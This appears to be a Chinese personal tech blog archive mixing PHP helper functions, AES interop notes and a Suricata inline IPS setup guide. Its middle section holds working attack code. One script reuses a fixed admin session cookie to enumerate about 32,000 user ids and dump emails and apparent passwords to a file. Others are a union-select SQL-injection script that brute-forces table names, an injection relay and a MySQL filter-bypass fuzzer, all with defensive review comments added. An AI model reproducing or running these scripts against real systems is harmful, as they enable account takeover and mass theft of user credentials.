月度归档:2016年12月

snorby mark

bundle exec rake snorby:setup

这一步始终过不去。

No time_zone specified in snorby_config.yml; detected time_zone: US/Eastern
3dd9afd796731d9f406d9cec0088c86e90995d4024acb27fa8710c99a48c1f73e431b6d8957a8de011cad066565c19354c85c5700378efc75d9ca15de46ae2ee
[datamapper] Created database 'snorby'
rake aborted!
TypeError: no implicit conversion of Fixnum into String

看了几遍代码, 没问题,

偶然想到数据库密码为123456

原config/database.yml为:

snorby: &snorby
  adapter: mysql
  username: root
  password: 123456
  host: localhost

改为 密码加上双引号(YAML 中不加引号的 123456 会被解析为整数而不是字符串,这正是上面 "no implicit conversion of Fixnum into String" 的来源):

snorby: &snorby
  adapter: mysql
  username: root
  password: "123456"
  host: localhost

php mark

#php 日期转换成TZ格式

// Current UTC time as an ISO 8601 / RFC 3339 timestamp ending in "Z".
// gmdate('c') would emit "+00:00"; the explicit format writes the literal Z.
$time_tz_str = gmdate('Y-m-d\TH:i:s\Z');
#2020-07-21T12:11:11Z

#trim 移除字符串

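/**
 * Strip $removestring from the start and/or the end of $string.
 *
 * @param string $string       Subject; returned untouched when not a string.
 * @param string $removestring Literal text to remove (treated as plain text,
 *                             not as a regular expression).
 * @return string
 */
function strim($string,$removestring){
    if (!is_string($string) || !is_string($removestring)){
        return $string;
    }
    // preg_quote() escapes regex metacharacters and the "/" delimiter, so a
    // caller-supplied value can neither break the pattern (a "/" made the
    // original emit a warning and return null) nor smuggle in its own syntax.
    $quoted = preg_quote($removestring, '/');
    $result = preg_replace("/^{$quoted}|{$quoted}$/", "", $string);
    return $result;
}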

#这样改strim会更好一点
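/**
 * Strip $removestring from the start and/or the end of $string; when no
 * $removestring is given, fall back to a plain whitespace trim().
 *
 * @param string      $string       Subject; returned untouched when not a string.
 * @param string|null $removestring Literal text to remove (not a regex).
 * @return string
 */
function strim($string,$removestring=''){
    if (!is_string($string)){
        return $string;
    }
    // Compare explicitly: "0" is a legitimate string to strip, but the
    // original truthiness test sent it down the trim() path instead.
    if ($removestring === '' || $removestring === null){
        return trim($string);
    }
    // Escape regex metacharacters and the "/" delimiter so the argument is
    // matched literally and cannot corrupt the pattern.
    $quoted = preg_quote((string)$removestring, '/');
    $result = preg_replace("/^{$quoted}|{$quoted}$/", "", $string);
    return $result;
}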

#curl request

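/**
 * Fetch $url with cURL, optionally POSTing $post and sending $cookie.
 *
 * @param string       $url          Target URL.
 * @param string|array $post         POST body (raw string or field array); GET when empty.
 * @param string       $cookie       Raw Cookie header value, sent when non-empty.
 * @param int          $returnCookie 1 to also return the first Set-Cookie value.
 * @param bool         $verifySsl    Verify the server certificate and hostname
 *                                   (default on; set false only for a known
 *                                   self-signed test endpoint).
 * @return string|array Response body, or ['cookie' => ..., 'content' => ...]
 *                      when $returnCookie is set. On a transport error the
 *                      curl error message is returned as a string, which is
 *                      indistinguishable from a body — callers that must tell
 *                      the two apart should check the result against
 *                      curl_error() semantics themselves.
 */
function curl_request($url,$post='',$cookie='', $returnCookie=0, $verifySsl=true){
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)');
    // NOTE(review): with FOLLOWLOCATION on, the $cookie header set below is
    // presumably re-sent to whatever host a redirect points at — confirm
    // that is acceptable for the cookies callers pass in.
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
    curl_setopt($curl, CURLOPT_REFERER, "http://XXX");
    if($post) {
        curl_setopt($curl, CURLOPT_POST, 1);
        //curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
    }
    if($cookie) {
        curl_setopt($curl, CURLOPT_COOKIE, $cookie);
    }
    curl_setopt($curl, CURLOPT_HEADER, $returnCookie);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    // TLS: VERIFYHOST must be 2 (1 is not a valid setting) and VERIFYPEER
    // must stay on; the original FALSE accepted any certificate, so an
    // on-path attacker could read or alter every https exchange. Plain http
    // URLs are unaffected by either option.
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, $verifySsl ? 2 : 0);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, $verifySsl ? true : false);
    $data = curl_exec($curl);
    if (curl_errno($curl)) {
        $error = curl_error($curl);
        curl_close($curl);   // the original returned without releasing the handle
        return $error;
    }
    // CURLINFO_HEADER_SIZE covers every header block received, including
    // those of followed redirects, whereas splitting at the first blank line
    // left later header blocks inside "content".
    $headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
    curl_close($curl);
    if($returnCookie){
        $header = substr($data, 0, $headerSize);
        $body   = substr($data, $headerSize);
        // First Set-Cookie "name=value" pair, without the leading space and
        // without attributes; '' when the response set no cookie (the original
        // read $matches[1][0] unguarded).
        $cookieValue = '';
        if (preg_match("/Set-Cookie:\s*([^;\r\n]*)/i", $header, $m)) {
            $cookieValue = $m[1];
        }
        return array('cookie' => $cookieValue, 'content' => $body);
    }else{
        return $data;
    }
}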

#php remove bom str

/**
 * Drop a leading UTF-8 byte-order mark (bytes EF BB BF) from $str.
 *
 * @param string $str
 * @return string $str without the BOM, or unchanged when it does not start with one.
 */
function str_remove_bom($str){
  $utf8_bom = "\xEF\xBB\xBF";   // decimal 239 187 191
  if (substr($str, 0, 3) === $utf8_bom) {
      return substr($str, 3);
  }
  return $str;
}

#php实现内存地址反转

/**
 * Reverse the byte order of a hex string, e.g. "0a0b0c" -> "0c0b0a"
 * (swap between the little- and big-endian reading of the same bytes).
 *
 * @param string $hex Hex digits, two per byte.
 * @return string
 */
function array_endtostart($hex){
	$byte_pairs = str_split($hex, 2);   // "0a0b0c" -> ["0a", "0b", "0c"]
	return implode("", array_reverse($byte_pairs));
}

#php 实现汇编中的pxor

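/**
 * XOR two hex strings byte by byte (a PHP stand-in for the pxor instruction)
 * and return the result as lowercase hex.
 *
 * @param string $a Hex string, two digits per byte.
 * @param string $b Hex string, two digits per byte.
 * @return string Hex of ($a XOR $b), as long as the shorter operand; "" when
 *                either input is not valid even-length hex.
 */
function xortnew($a,$b){
	// Validate up front: hex2bin() returns false with a warning for an odd
	// length or a non-hex character, and the original per-chunk loop then
	// XORed against an empty string and silently dropped bytes.
	$hex_re = '/\A(?:[0-9a-fA-F]{2})*\z/';
	if (!preg_match($hex_re, (string)$a) || !preg_match($hex_re, (string)$b)) {
		return "";
	}
	// PHP's string XOR truncates to the shorter operand — the same length
	// the original produced once $b ran out of pairs.
	return bin2hex(hex2bin($a) ^ hex2bin($b));
}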
// Worked example (derived by hand from the byte-wise XOR above): every byte of
// the first operand XORed with 0x0c, expected to print
// string(32) "322d372d383130320c0c0c0e29366c00".
var_dump(xortnew("3e213b21343d3c3e00000002253a600c","0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c0c"));

#php 查找字符串与替换

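/**
 * Inside every <pre>...</pre> block of $str, replace tabs with four &nbsp;
 * entities and decode &#39; back to a literal apostrophe.
 *
 * @param string $str HTML fragment.
 * @return string
 */
function tapreplace($str){
    // Lazy ".*?" so each <pre> block is matched on its own: the greedy form
    // matched from the first <pre> to the LAST </pre> and rewrote the text
    // between two blocks as well.
    $newstr=preg_replace_callback("/(<pre.*?<\/pre>)/s",function ($match){
        $text = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $match[0]);
        $text = str_replace("&#39;", "'", $text);
        // NOTE(review): the page shows three further replacements ('#', '"',
        // "'") mapped onto themselves — their entity forms were evidently lost
        // when the post was rendered, so they are no-ops here and are omitted;
        // restore them from the original source if they were intentional.
        return $text;
    },$str);
    return $newstr;
}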

#dokuwiki在php7下报operator not supported for strings in 错

inc\lessc.inc.php

	public $importDir = '';
#改为
	public $importDir = array();

#CryptoJS 与php互通

#CryptoJS 中
#128位AES加密
// 16-byte (AES-128) key and 16-byte IV; both must reach the PHP side as hex
// for the hex2bin() calls that follow.
// NOTE(review): CryptoJS releases before 4.0 implement WordArray.random() with
// Math.random(), which is not a CSPRNG — confirm the version in use or feed
// key/iv from crypto.getRandomValues() instead.
var key = CryptoJS.lib.WordArray.random(16);
var iv =  CryptoJS.lib.WordArray.random(16);
// With a WordArray key (not a passphrase) CryptoJS derives nothing and adds no
// "Salted__" header, so encrypted.toString() is plain base64 of the CBC
// ciphertext — presumably what the PHP side below expects; verify once.
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        // Raw key/IV bytes from the hex exported by CryptoJS ('xxxxxxx' is a
        // placeholder: 32 hex chars for the 16-byte AES-128 key, 32 for the IV).
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        // Ciphertext from encrypted.toString() on the JS side; options=false (0)
        // makes openssl_decrypt expect base64 input and strip PKCS#7 padding.
        $str="xxxxx";
        // NOTE(review): CBC gives confidentiality only. If $str can arrive from
        // an untrusted sender, verify an HMAC over iv||ciphertext before this
        // call (or use an AEAD mode such as aes-128-gcm) so tampered input is
        // rejected rather than decrypted.
        $result =openssl_decrypt($str,'aes-128-cbc',$key_str,false,$iv_str);

#192 aes
// 24-byte key selects AES-192; the IV stays one 16-byte block.
// NOTE(review): WordArray.random() is Math.random()-based in CryptoJS < 4.0 —
// confirm the version before relying on it for keys.
var key = CryptoJS.lib.WordArray.random(24);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        // AES-192 variant: 48 hex chars of key, 32 of IV (placeholders here).
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        // options=false: base64 input, PKCS#7 padding removed. Unauthenticated
        // CBC — add a MAC check before decrypting untrusted input.
        $result =openssl_decrypt($str,'aes-192-cbc',$key_str,false,$iv_str);


#256 aes:

// 32-byte key selects AES-256; the IV stays one 16-byte block.
// NOTE(review): WordArray.random() is Math.random()-based in CryptoJS < 4.0 —
// confirm the version before relying on it for keys.
var key = CryptoJS.lib.WordArray.random(32);
var iv =  CryptoJS.lib.WordArray.random(16);
var encrypted = CryptoJS.AES.encrypt("teststring", key, {iv:iv});
#php:
        // AES-256 variant: 64 hex chars of key, 32 of IV (placeholders here).
        $key_str = hex2bin('xxxxxxx');
        $iv_str = hex2bin('xxxxxxx');
        $str="xxxxx";
        // options=false: base64 input, PKCS#7 padding removed. Unauthenticated
        // CBC — add a MAC check before decrypting untrusted input.
        $result =openssl_decrypt($str,'aes-256-cbc',$key_str,false,$iv_str);

#php try catch warning

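// Turn PHP warnings/notices into ErrorException so they can be caught with
// try/catch. Errors silenced with the @-operator are still skipped.
set_error_handler(function($errno, $errstr, $errfile, $errline, array $errcontext = array()) {
    // @-operator check that works on both major versions: PHP 7 sets
    // error_reporting() to 0 for the silenced call, PHP 8 only masks the
    // individual level bits (so "0 === error_reporting()" never fires there).
    if (!(error_reporting() & $errno)) {
        return false;
    }

    // $errcontext is only passed by PHP 7 and older; without the default the
    // handler fails with ArgumentCountError on PHP 8.
    throw new ErrorException($errstr, 0, $errno, $errfile, $errline);
});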


#然后直接try就可以了
        // With the ErrorException handler installed, a malformed $rule (it is
        // interpolated unescaped into the pattern) turns preg_match's compile
        // warning into an exception instead of a silent false. If $rule is meant
        // as literal text rather than a regex, preg_quote($rule, '/') would
        // avoid the exception path altogether.
        try{
            if (preg_match("/{$rule}/", $result['url'])) {
                $end['match']=1;
                $end['code_error']=0;
            }
            if ($result['code'] == 404) {
                $end['code_error']=1;
            }
        }catch (Exception $e){
            // ErrorException extends Exception, so the converted warnings land
            // here; the offending rule is dumped for inspection.
            var_dump($rule);
        }

#数组对象转换

/**
 * 数组 转 对象
 *
 * @param array $arr 数组
 * @return object
 */
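/**
 * Array to object: recursively convert an array (and every nested array) into
 * stdClass objects. Objects already present are kept as they are.
 *
 * @param array $arr
 * @return object|null stdClass tree, or null when $arr is not an array.
 */
function array_to_object($arr)
{
    if (!is_array($arr))
    {
        return;
    }
    foreach ($arr as $k => $v)
    {
        // Only arrays are recursed into. The original also recursed into
        // objects, but array_to_object() returns null for a non-array, so
        // (object)null replaced every nested object with an EMPTY stdClass.
        if (is_array($v))
        {
            $arr[$k] = array_to_object($v);
        }
    }
 
    return (object)$arr;
}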
 
/**
 * 对象 转 数组
 *
 * @param object $obj 对象
 * @return array
 */
/**
 * Object to array: cast $obj and every nested object or array to plain arrays.
 *
 * @param object $obj  (an array is accepted too; the cast is a no-op for it)
 * @return array|null Array tree, or null as soon as a resource is met at this
 *                    level — a nested null then becomes an empty array via
 *                    the (array) cast at the call site.
 */
function object_to_array($obj)
{
    $as_array = (array)$obj;
    foreach ($as_array as $key => $member)
    {
        // Resources have no array form; the conversion gives up on them.
        if (is_resource($member))
        {
            return;
        }
        if (is_object($member) || is_array($member))
        {
            $as_array[$key] = (array)object_to_array($member);
        }
    }
 
    return $as_array;
}

#一个无极限分类

/**
 * Build a parent/child tree from a flat node list using references.
 *
 * Assumes $result is keyed by pro_id (both lookups below index $result with
 * pid / pro_id) and that every node carries 'pid' and 'pro_id' — TODO confirm
 * with the code that produces $result. Children are appended under the
 * parent's 'son' key; nodes whose pid is not a key of $result become roots.
 * Because each attachment is a reference into $result, input order does not
 * matter: a parent listed after its child still ends up holding it. A node
 * whose pid equals its own pro_id would make itself its own child.
 *
 * @param array $result Flat nodes indexed by pro_id.
 * @return array Root nodes, each with its 'son' subtree.
 */
function get_tree($result){
        $tree = array();
        foreach($result as $item){
            if(isset($result[$item['pid']])){
                // Reference, not copy: children attached to this node later
                // are visible through the tree as well.
                $result[$item['pid']]['son'][] = &$result[$item['pro_id']];
            }else{
                $tree[] = &$result[$item['pro_id']];
            }
        }
        return $tree;

}

//生成无极限的数据

//用递归展示处理的数据
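    /**
     * Print a tree such as get_tree()'s output as indented HTML lines (echo only).
     *
     * @param array $data  Nodes with 'pro_name' and an optional 'son' child list.
     * @param int   $level Nesting depth; each level adds one more &emsp;&emsp; pair.
     */
    function getviewdata($data,$level=0){
            foreach($data as $key=>$value){
                // $level+1 indents: the original loop ran from 0 through $level.
                echo str_repeat('&emsp;&emsp;', $level + 1);
                // The name is emitted into HTML: escape it so markup in a
                // product name is shown literally instead of rendered/executed.
                echo htmlspecialchars($value['pro_name'], ENT_QUOTES, 'UTF-8');
                echo '<br>';
                if(!empty($value['son'])){
                    getviewdata($value['son'],$level+1);
                }
            }
    }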
    // $xx is not defined on this page; presumably the root list returned by
    // get_tree() — verify against the caller.
    getviewdata($xx);




#某脱库脚本

/**
 * Fetch the admin order page for user $i and pull out the account name and
 * the product ids listed for it.
 *
 * NOTE(review): this hits an authenticated admin route with a fixed PHPSESSID
 * and a sequentially increasing uid (see the driver loop below). From the
 * defending side that combination is the thing to alert on in access logs —
 * one session id, constant User-Agent and Referer, a monotonically increasing
 * id in the path at a steady cadence — and the controls that blunt it are
 * short-lived admin sessions bound to the client, per-request authorization
 * on /product/order/index/uid/{id}, and rate limiting of that route.
 *
 * @param int $i User id to request.
 * @return array ['email' => ..., 'pid' => [...]] or an empty array when the
 *               page yields nothing usable.
 */
function getuidinfo($i){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/order/index/uid/{$i}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
// Isolate the table body, then walk it line by line.
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}

$result_out=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

// Column 3 -> product id, the trailing link text -> account name
// (the last row's name wins).
preg_match('#^<td>\d+</td><td>.*</td><td>(.*)</td><td>\d+\.\d+</td><td>[^<]*</td><td>[^<]*</td><td><a[^>]*>([^<]*)</a></td>#',$a_tmp,$a_result);
$result_out[]=$a_result[1];
$account_name = $a_result['2'];
}
if (!isset($account_name)){
return array();
}
$result_out=array_unique($result_out);

$return['email']=$account_name;
$return['pid']=$result_out;

return $return;
}


/**
 * Fetch the admin user listing filtered by $product_id and return the value
 * of its fourth column (the last matching row wins).
 *
 * Same scraping pattern as getuidinfo(): fixed PHPSESSID, constant
 * User-Agent/Referer, one request per id at a steady cadence — the same log
 * signature and the same session/authorization controls apply.
 *
 * @param mixed $product_id Value placed in the keyword filter.
 * @return string|array Column value, or an empty array when nothing matched.
 */
function getproduct($product_id){
sleep(0.5);
$url="http://www.xxx.cn/admin.php?s=/product/user/index&keyword={$product_id}";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/xxx (KHTML, like Gecko) Chrome/xxx Safari/xxx');
curl_setopt($ch, CURLOPT_REFERER,'http://www.xxx.cn/admin.php?s=/product/order/index/uid/24');
curl_setopt($ch, CURLOPT_COOKIE,'PHPSESSID=vhbnfht14o07cvrhnuq5ir6o77');
$output = curl_exec($ch);
curl_close($ch);
preg_match_all('/<tbody>.*<\/tbody>/ims',$output,$result);
if(!isset($result[0][0]) || !$result[0][0]){
return array();
}
$tmp_array= explode("\n",$result[0][0]);
if(!$tmp_array){
return array();
}
$result=array();
foreach ($tmp_array as $a_tmp){
$a_tmp = trim($a_tmp);
if(!preg_match('/^<td>\d+<\/td>/',$a_tmp)){
continue;
}

// Fourth <td> of the row is the value returned.
preg_match('#^<td>\d+</td><td><a[^>]*>[^<]*</a></td><td>[^<]*</td><td>([^<]*)</td>#',$a_tmp,$a_result);
$result=$a_result[1];
}
if(!$result){
return array();
}
return $result;

}

// Driver: walk uids 1..32166, combine each account name with the per-product
// values and append one "uid:.. email:..:v1|v2" line to pwd.txt (flag 8 is
// FILE_APPEND).
// NOTE(review): the variable names ($pwd, pwd.txt) indicate what the scraped
// column holds. If an admin listing really exposes recoverable credentials
// per product, that exposure is the finding to fix first (hash or omit the
// column) — independently of blocking the enumeration itself.
for($i=1;$i<32167;$i++){
$uidinfo = getuidinfo($i);
if(!$uidinfo){
continue;
}
echo $i."\n";
$strs = "uid:{$i} email:".$uidinfo['email'].":";
$pwd_tmp=array();
foreach($uidinfo['pid'] as $pid){
$pwd = getproduct($pid);
if(!$pwd){
continue;
}
$pwd_tmp[]=$pwd;
}
$pwd_tmp=array_unique($pwd_tmp);
$pwd_str =implode("|",$pwd_tmp);
$strs .=$pwd_str."\n";

file_put_contents("pwd.txt",$strs,8);
sleep(0.5);
}

#thinkphp路由模式

http://www.xxx.net/product/index/xxx/id/29192
=>
http://www.xxx.net/index.php?m=product&c=index&a=xxx&id=29192

#跑表名

// Reads candidate table names from the file "tables" and probes each one
// through the id parameter; a name is printed when the response does NOT
// contain the literal "exist" (presumably an error-page string).
// NOTE(review): the payload shape here — ") and 1=1 and 1=2 union select ...
// --" in the URL — is exactly what the suricata test further down this page
// expects to see logged in fast.log. For the defender the handles are that
// rule hit, a burst of requests for one id with varying payloads from a single
// PHPSESSID at a ~2 s cadence, and the error pages they trigger; the fix on
// the application side is a parameterised query on the id route.
set_time_limit(0);
$tables = file("tables");

foreach ($tables as $a_tables){
$a_tables = trim($a_tables);
$url = "http://www.xxx.net/product/index/xxx/id/29192) and 1=1 and 1=2 union select 29192,29192,29192,2,2,4,5,(select id from ss_{$a_tables} where id>1 limit 0,1 ),7,8,9,10,2 -- a";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);

$garbage = strstr($output, "exist");
if($garbage == false) 
{
echo $a_tables."<br>";
} 
sleep(2);

}

#inject

// Relays this script's own ?id= parameter straight into a boolean condition
// ("and 1={$i}") on the target and prints the raw response.
// NOTE(review): $_GET['id'] is never validated, so anyone who can reach this
// script controls the whole injected expression as well — it is an open relay
// in its own right. Detection handles are the same as for the table loop
// above: a fixed PHPSESSID and ") and 1=" inside the id segment of the URL.
$i = $_GET['id'];
sleep(1);
$url = "http://xxx.xxx.net/xxx/index/xxx/id/29192) and 1={$i} --";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_COOKIE,'PHPSESSID=ddk0k3c1q3a9nio7rl4fkihtf4');
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

#fuzz1

<?php
// Local harness: for every byte pair (i, j) below 255, run
// `select count(*) from information_schema<i><j>SCHEMATA` and print the pairs
// MySQL still parses as information_schema.SCHEMATA (judged by the row count
// matching the expected 10 — presumably the schema count on this server).
// NOTE(review): the result shows how far MySQL's own tokenizer diverges from
// a naive notion of "whitespace"; the conclusion for a defender is that
// parameterised queries, not byte or keyword blacklists, are what closes the
// gap. The harness connects as root with a hard-coded password — keep it on a
// throwaway local database only.
$con=mysqli_connect("localhost","root","123456","test"); 
if (mysqli_connect_errno($con)) 
{ 
   echo 111;
	exit;
} 


for($i=0;$i<255;$i++) {

	for($j=0;$j<255;$j++) {

$char_str = chr($i);
$charj_str = chr($j);
$strs = "select count(*) from `information_schema`{$char_str}{$charj_str}`SCHEMATA`";
$result=mysqli_query($con,$strs);
$posts = array();
// "@" hides the fetch error for the (many) pairs that fail to parse.
while($row = @mysqli_fetch_array($result)) {
    $posts[] = $row;
} 
if(isset($posts[0]) && $posts[0][0]==10 ){
echo "<font color=red>aaaa</font>{$i}|{$j}<br>";
}


	}

}  


mysqli_close($con);

#毫秒

// Millisecond part of the current time, zero-padded to three digits.
// microtime() returns "0.<fraction> <seconds>"; the fraction scaled by 1000
// and truncated by %d is the millisecond value.
$time_parts = explode(" ", microtime());
$usec = $time_parts[0];
$sec  = $time_parts[1];
$lusec = sprintf('%03d', $usec * 1000);

suricata nat下部署

Mark:

实验环境:

最好两台真机,至少一台虚拟机一台真机,不推荐两台实验环境都为虚拟机(两台都是虚拟机时, route表中的配置可能不会生效)

A:172.20.8.42   IPS (功能)

B:172.20.8.8     pc

要求: B -> A -> internet;  B若访问的地址存在攻击行为,则阻断

A:

#安装suricata

# Build dependencies (the one-click script further down lists a superset).
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0  # resolve build dependencies
# Unpinned archive, built and installed as root with no checksum/signature
# check — verify it against what upstream publishes before "make install".
wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip
unar suricata-3.2.zip
# NOTE(review): the install script later on this page enters the same archive
# as "suricata-suricata-3.2"; one of the two directory names is presumably off.
cd suricata-3.2
git clone https://github.com/OISF/libhtp.git  # suricata depends on libhtp; clone it (unpinned) into the source tree
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var
make
make install
make install-conf
make install-rules
ldconfig

#配置转发环境

# Routing for the B -> A -> internet path. Not persistent: set
# net.ipv4.ip_forward=1 via sysctl.conf to survive a reboot.
echo 1 > /proc/sys/net/ipv4/ip_forward


#配置iptables

# IPS mode: every packet on INPUT/OUTPUT/FORWARD is handed to NFQUEUE 0, which
# suricata services when started with "-q 0" below.
# Caveat: while no process is bound to the queue the kernel DROPS queued
# packets, so if suricata dies the host — SSH included — goes dark. Apply
# these from an out-of-band console, and consider "-j NFQUEUE --queue-bypass",
# which lets traffic through uninspected while the queue is unbound. The
# "--state ESTABLISHED,RELATED" rule is redundant after the blanket
# "-I FORWARD -j NFQUEUE" that precedes it.
iptables -I INPUT -j NFQUEUE && iptables -I OUTPUT -j NFQUEUE &&iptables -I FORWARD -j NFQUEUE && iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j NFQUEUE   # for IDS mode replace NFQUEUE with ACCEPT


# Source NAT for forwarded traffic; per the author, needed for the packets to
# be captured. NOTE(review): "-s 172.20.8.5" does not match the client B given
# as 172.20.8.8 above — confirm which address is right.
iptables -t nat -A POSTROUTING -s 172.20.8.5 -j SNAT --to 172.20.8.42 # source-address translation for forwarded traffic; needed to capture the packets

# NOTE(review): ifconfig's "-promisc" CLEARS the promiscuous flag ("promisc"
# sets it). For inline NFQUEUE operation the interface need not be
# promiscuous, so the command is fine; the comment is what is misleading.
ifconfig eth0 -promisc  # (original comment: promiscuous mode)

#修改suricata配置

#suricata.yaml
HOME_NET: "![172.20.0.0/16]"  #HOME_NET 把外部地址当成目标为自己的就能匹配rules

#启动

# Inline mode: read packets from NFQUEUE 0 (the queue the iptables rules
# above feed) and issue verdicts; HOME_NET must already be set as described.
suricata -c /etc/suricata/suricata.yaml -q 0

B:

把电脑的网关设置为 172.20.8.42  就行了

#测试注意

最好用浏览器测试:http://xxx.com/xxx.php?id=1 and 1=2 union select id from test where id=1      在/var/log/suricata/fast.log  文件中出现记录表示成功

若用curl命令行测试  则应为  curl "http://xxx.com/xxx.php?id=1%20and%201=2%20union%20select%20id%20from%20test%20where%20id=1"  #命令行下不会自动把空格转义为%20   若不添加  suricata 识别不了 匹配不了rules

#更新

功能尽量装全

# Fuller dependency set (adds prelude, lua, geoip, hiredis headers).
apt-get install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev libnfnetlink0


# NOTE(review): --enable-debug, --enable-debug-validation, --enable-profiling,
# --enable-profiling-locks and --enable-unittests are developer-build options
# that add checks and lock instrumentation on the packet path; leave them off
# for a sensor that is actually inline.
./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude 

另在NAT转发下会导致服务端丢失真实源IP,所以另拿一台机器做分析,用iptables做端口镜像(或者daemonlogger)

# Mirror both directions of port-80 traffic to the analysis host. TEE clones
# the packet to --gateway, which must be reachable on the same link as eth0;
# only plain HTTP is mirrored here (no --dport/--sport 443), so TLS traffic
# stays unobserved.
iptables -A INPUT -i eth0 -p tcp -m tcp --sport 80 -j TEE --gateway 172.20.8.147
iptables -A OUTPUT -o eth0 -p tcp -m tcp --dport 80 -j TEE --gateway 172.20.8.147

#注意,input output 都得镜像过来, 就像nat下不添加iptables的源地址转换,就相当于只有input,suricata 在此种情况下不进行protocol分析。

#若只镜像注入的流量,则在suricata.yaml文件中 不过功能会有BUG,建议镜像双向流量

--set stream.async-oneside=true

#另附suricata snort 一键安装脚本

# Combined dependency list for suricata + snorby + barnyard2 (several packages
# are repeated; harmless for apt).
apt-get install wkhtmltopdf gcc g++ build-essential libssl-dev libreadline6-dev zlib1g-dev libsqlite3-dev libxslt-dev libxml2-dev imagemagick git-core libmysqlclient-dev libmagickwand-dev default-jre ruby ruby-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev libjansson-dev libjansson4 pkg-config libprelude-dev liblua5.1-dev libgeoip-dev libhiredis-dev mysql-server apache2 apache2-dev libapr1-dev libaprutil1-dev libcurl4-openssl-dev libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libcap-ng-dev libcap-ng0 make libmagic-dev git pkg-config libnss3-dev libnspr4-dev wget mysql-client libmysqlclient-dev libdumbnet-dev libmysqlclient18 flex bison libpq-dev postgresql-server-dev-all libdnet-dev unar



#install suricata begin
cd /tmp
# Unpinned, unverified archive built and installed as root; check it against
# an upstream checksum/signature first.
wget https://github.com/inliniac/suricata/archive/suricata-3.2.zip
unar suricata-3.2.zip
cd suricata-suricata-3.2
git clone https://github.com/OISF/libhtp.git  # suricata depends on libhtp; clone it (unpinned) into the source tree
./autogen.sh
# NOTE(review): the --enable-debug*/--enable-profiling*/--enable-unittests
# flags produce a developer build with extra checks on the packet path; drop
# them for a sensor that is meant to run inline.
